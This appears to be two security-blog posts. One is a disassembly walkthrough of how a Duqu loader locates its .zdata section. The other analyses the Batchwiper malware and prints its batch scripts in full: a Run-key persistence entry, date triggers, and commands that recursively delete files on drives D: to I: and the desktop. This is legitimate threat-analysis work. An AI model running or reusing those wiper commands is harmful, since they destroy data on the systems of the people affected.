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How Duqu resource 302 finds the .zdata section

Just a short blog entry to save this info for the history.

We investigated originally two different pieces of duqu payload. One contained resource 302 with a compressed .zdata section, the other contained the to-be-injected code without compression. The injector-loader is the same for the two versions, then how does it find if .zdata should be loaded?

Here is the trick from netp 301 resource:

.text:10001220 mov ecx, 5A4Dh
.text:10001225 cmp [eax], cx
.text:10001228 jnz loc_100012CD
.text:1000122E mov ecx, [eax+3Ch]
.text:10001231 add ecx, eax
.text:10001233 cmp dword ptr [ecx], 4550h
.text:10001239 jnz loc_100012CD

First it checks for “MZ” header, then it check “PE” signature.

.text:1000123F movzx edx, word ptr [ecx+6] ; number of sections in PE File (5)
.text:10001243 cmp dx, 3
.text:10001247 jbe loc_100012CD
.text:1000124D movzx esi, word ptr [ecx+14h] ; pointer to symbol table
.text:10001251 movzx edx, dx
.text:10001254 imul edx, 28h ; each section entry in section table- 40 byte
.text:10001257 add edx, ecx
.text:10001259 lea edi, [esi+edx-38h] ; the section before the last section (zdata) + offset
.text:1000125D test edi, edi
.text:1000125F jz short loc_100012CD
.text:10001261 cmp dword ptr [edi+1Ch], 0BC395587h ; zdata magic PE Header NumberOfRelocations is abused
.text:10001268 jnz short loc_100012CD
.text:1000126A cmp dword ptr [edi+8], 2Ch ; some check on physical size
.text:1000126E jb short loc_100012CD

As you can see, it calculates the exact place for the end of the section table then moves back to the entry before the last (this is .zdata info). Then it checks for a magic number 0xBC395587 which is stored in “NumberOfReloctions” value.

.text:10001270 mov esi, [edi+0Ch]
.text:10001273 add esi, eax
.text:10001275 cmp dword ptr [esi], 0D139120Eh
.text:1000127B jnz short loc_100012CD

Finally it checks the first 4 bytes of the .zdata section against 0xD139120e.

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#Batchwiper – Batchwiper malware (target:Iran)

Iranian CERT Maher just posted

Latest investigation have been done by Maher center in cyber space identified a new targeted data wiping malware. Primitive analysis revealed that this malware wipes files on different drives in various predefined times. Despite its simplicity in design, the malware is efficient and can wipe disk partitions and user profile directories without being recognized by anti-virus software. However, it is not considered to be widely distributed. This targeted attack is simple in design and it is not any similarity to the other sophisticated targeted attacks. The identified components of this threat are listed in the following table”…

As it happens quite some time, the malware itself seems not to be much of interest, but the possible targets and the way they probably used it makes it more into attention. So don’t judge too early about the lameness of such tool, it can still pinpoint an important action.

The main file, GrooveMonitor.exe is a self-extracting file, it contains a rar file at position 103936. The rar contains juboot, jucheck and sleep.

GrooveMonitor.exe [dropper] f3dd76477e16e26571f8c64a7fd4a9
juboot.exe fa0b300e671f73b3b0f7f415ccbe9d41
jucheck.exe c4cd216112cbc5b8c046934843c579f6
SLEEP.EXE ea7ed6b50a9f7b31caeea372a327bd37
WmiPrv.exe b7117b5d8281acd56648c9d08fadf630

Sleep.exe is basically a public tool available for batch programmers:

juboot is a UPX 3.03 compressed archive of a probably bat2exe converted file (not checked what exactly) (very low on budget to write batch malware?), that contains these:

@echo off & setlocal
sleep for 2
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v jucheck.exe /t REG_SZ /d "%systemroot%\system32\jucheck.exe" /f

start "" /D"%systemroot%\system32\" "jucheck.exe"


jucheck contains
@echo off & setlocal

sleep for 2
del "%systemroot%\system32\juboot.exe" /q /s /f
del "%userprofile%\Start Menu\Programs\Startup\GrooveMonitor.exe" /q /s /f

if "%date%"=="Mon 12/10/2012" goto yes
if "%date%"=="Tue 12/11/2012" goto yes
if "%date%"=="Wed 12/12/2012" goto yes

if "%date%"=="Mon 01/21/2013" goto yes
if "%date%"=="Tue 01/22/2013" goto yes
if "%date%"=="Wed 01/23/2013" goto yes

if "%date%"=="Mon 05/06/2013" goto yes
if "%date%"=="Tue 05/07/2013" goto yes
if "%date%"=="Wed 05/08/2013" goto yes

if "%date%"=="Mon 07/22/2013" goto yes
if "%date%"=="Tue 07/23/2013" goto yes
if "%date%"=="Wed 07/24/2013" goto yes

if "%date%"=="Mon 11/11/2013" goto yes
if "%date%"=="Tue 11/12/2013" goto yes
if "%date%"=="Wed 11/13/2013" goto yes

if "%date%"=="Mon 02/03/2014" goto yes
if "%date%"=="Tue 02/04/2014" goto yes
if "%date%"=="Wed 02/05/2014" goto yes

if "%date%"=="Mon 05/05/2014" goto yes
if "%date%"=="Tue 05/06/2014" goto yes
if "%date%"=="Wed 05/07/2014" goto yes

if "%date%"=="Mon 08/11/2014" goto yes
if "%date%"=="Tue 08/12/2014" goto yes
if "%date%"=="Wed 08/13/2014" goto yes

if "%date%"=="Mon 02/02/2015" goto yes
if "%date%"=="Tue 02/03/2015" goto yes
if "%date%"=="Wed 02/04/2015" goto yes
goto no


sleep for 3000
IF EXIST d:\ del "d:*." /q /s /f
IF EXIST d:\ Chkdsk d:
IF EXIST e:\ del "e:*.
" /q /s /f
IF EXIST e:\ Chkdsk e:
IF EXIST f:\ del "f:*." /q /s /f
IF EXIST f:\ Chkdsk f:
IF EXIST g:\ del "g:*.
" /q /s /f
IF EXIST g:\ Chkdsk g:
IF EXIST h:\ del "h:*." /q /s /f
IF EXIST h:\ Chkdsk h:
IF EXIST i:\ del "i:*.
" /q /s /f
IF EXIST i:\ Chkdsk i:

del "%userprofile%\Desktop*.*" /q /s /f
\start calc


Still the questions are
a.) What is the dropper
b.) Is it surely an important attack, no matter how amateur the tools are?